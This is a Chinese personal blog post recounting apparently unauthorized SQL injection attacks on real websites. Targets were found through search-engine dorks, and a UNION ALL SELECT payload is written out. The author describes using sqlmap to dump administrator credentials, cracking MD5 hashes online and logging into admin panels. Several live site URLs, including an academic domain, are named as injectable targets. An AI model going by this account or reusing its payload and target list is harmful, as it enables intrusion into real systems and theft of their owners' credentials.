SQL注入实战

sqlmap注入实战

第一个漏洞值得记录:

想着用谷歌语法找找最简单的sql注入试试实战

漏洞URL:http://www.igbt-leader.com/newsinfo.php?id=55

1、判断id传参处明显存在SQL注入

image-20210511194512055

2、构造联合查询payload进行获取数据如下

Payload: id=-9845 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178786271,0x4948654e5072676e454c6e6f4a506d72625544685871707977427444534b6b726572687741685542,0x7170706a71)– -

image-20210511194541891

3、SQLmap进行管理员账号和密码获取,密码进行MD5网上解密

image-20210511193811479
image-20210511193925506
image-20210511194002847

4、使用7kb制作的扫描工具快速找到后台,成功登陆后台,目前还没找到上传点,技术还得继续努力

image-20210511194227463

1、对新闻页面进行传参测试

image-20210421090845992

2、错误传参无显示

image-20210421091004618

3、判断可能存在SQL注入出现数据库泄露后台密码

image-20210421091156279

image-20210421091215552

image-20210421091401894

4、直接可以登录后台

image-20210421091514101

http://www.shbtpm.com/webinfo.php?InfoID=1&LX=1

URL:http://www.caep-scns.ac.cn/HPCMid_js.php?id=757

本文标题:SQL注入实战

文章作者:孤桜懶契

发布时间:2021年04月20日 - 20:45:32

最后更新:2021年10月20日 - 13:12:07

原始链接:https://gylq.gitee.io/posts/25.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------